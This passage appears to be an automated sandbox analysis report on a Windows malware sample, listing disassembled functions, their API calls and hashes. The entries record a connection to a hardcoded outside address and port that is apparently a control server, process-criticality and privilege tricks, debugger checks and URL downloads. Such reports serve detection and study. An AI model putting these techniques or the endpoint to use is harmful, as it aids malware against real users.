                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                      • Opcode ID: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                      • Instruction ID: 940d55c7aea47baa15732b8373ec63bb8ecc0fa7aba131a5eb793c07d5a03037
                                                                                                                                                                      • Opcode Fuzzy Hash: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                      • Instruction Fuzzy Hash: 77D05EB290000CBBE705CF88CC02AE977ACE784305F00C069EA0A86240EA31AA504691

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 10001170 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87librarywindowloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 1000125F
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001269
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                      • String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
                                                                                                                                                                      • API String ID: 3658383123-467612925
                                                                                                                                                                      • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
                                                                                                                                                                      • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10
                                                                                                                                                                      Function 02861A37 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02861A74
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 02861A9A
                                                                                                                                                                      • SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 02861ACE
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 02861B20
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 02861B2B
                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 02861B44
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4292518056-3916222277
                                                                                                                                                                      • Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                      • Instruction ID: cc752dcd52aa9265c7c0a36d6adc18b2905358c888318f77e8925626a8a4a4c9
                                                                                                                                                                      • Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A3128B8640208FFEB10DF98CC89FAA7BB5EB48705F10C148FA09AB291D770D950CB65
                                                                                                                                                                      Function 1001124D Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 10011325
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 10011348
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1045392073-0
                                                                                                                                                                      • Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                      • Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
                                                                                                                                                                      • Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45
                                                                                                                                                                      Function 0286EE57 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,02861D65), ref: 0286EE95
                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(02861D65,00000000), ref: 0286EEB0
                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0286EEE7
                                                                                                                                                                      • RpcStringFreeW.RPCRT4(02861D65), ref: 0286EEF1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1126441048-0
                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction ID: ae46d6974ea60b10b24dce4f842b24a2ed8d0120ca92f721577ae9fb52ee315a
                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction Fuzzy Hash: CD11DAB5D00219BFEB14CFE4C989BEEBBB4FB08704F108559E605B7280D7B59A54CBA0
                                                                                                                                                                      Function 100113E9 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1001140A
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10011413
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 10011420
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                      • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                      Function 02871521 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                      • Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                      • Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                      • Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51
                                                                                                                                                                      Function 02871520 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                      • Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                      • Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
                                                                                                                                                                      • Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                      • Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11
                                                                                                                                                                      Function 02870EE7 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02870EFD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction ID: d98202a22532f577ecb4645af019a0a68f0e8506740e40155c68da1d17d8fa4f
                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA149B9A10715CBEB1ACF58C8C579ABBB1FB48324F24C52AE429EB6A0D334D540CF50
                                                                                                                                                                      Function 10010F10 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90
                                                                                                                                                                      Function 02861087 Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 02861135
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                      • Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                      • Instruction ID: 856db20c47a496988a0d8a66210a93f0feb4fdd4e401a7462383dea50b9fbc9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                      • Instruction Fuzzy Hash: B621EB78A44209AFEB14CF94CC8ABFD7775EB48701F109059FA1AAA2D1D7B09540CB51
                                                                                                                                                                      Function 02860AE4 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                      • Instruction ID: 634bfd2156d84de619274b3c3120b2bc194c5d1f1ca33c58dade77456779207e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                      • Instruction Fuzzy Hash: 2131AA7AA0834B8FC310DF18C48092AB3E5FF89218F1A496DE985D7312E330F959CB95
                                                                                                                                                                      Function 100100C0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 100100E3
                                                                                                                                                                      • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010139
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 10010182
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010196
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                                                                      • String ID: 118.107.44.219$18852
                                                                                                                                                                      • API String ID: 2357443324-3001398927
                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65
                                                                                                                                                                      Function 1000CDE0 Relevance: 21.2, APIs: 14, Instructions: 249COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
                                                                                                                                                                      • ?flags@ios_base@std@@QBEHXZ.MSVCP140(6CC04730), ref: 1000CEE5
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000F2B3,?,?), ref: 1000CFB4
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
                                                                                                                                                                      • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4125389999-0
                                                                                                                                                                      • Opcode ID: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                      • Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
                                                                                                                                                                      • Opcode Fuzzy Hash: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                      • Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90
                                                                                                                                                                      Function 02870097 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 028700BA
                                                                                                                                                                      • getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 02870101
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 02870110
                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 02870159
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 0287016D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2560534018-0
                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction ID: 21b0b0790c34189d8d3567152e655fbba220c72fba53aaa7af3dd52b19a4c61b
                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction Fuzzy Hash: 456119B9905215EFE705DFA8CD88BAE7BB5FB08315F108199E509A72A0C734D940CF65
                                                                                                                                                                      Function 02861B87 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 143networkwindowfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 02861BA1
                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 02861BBD
                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 02861C04
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 02861C21
                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 02861C3C
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 02861CF2
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D0F
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D19
                                                                                                                                                                      • GetParent.USER32(?), ref: 02861D23
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 02861D32
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
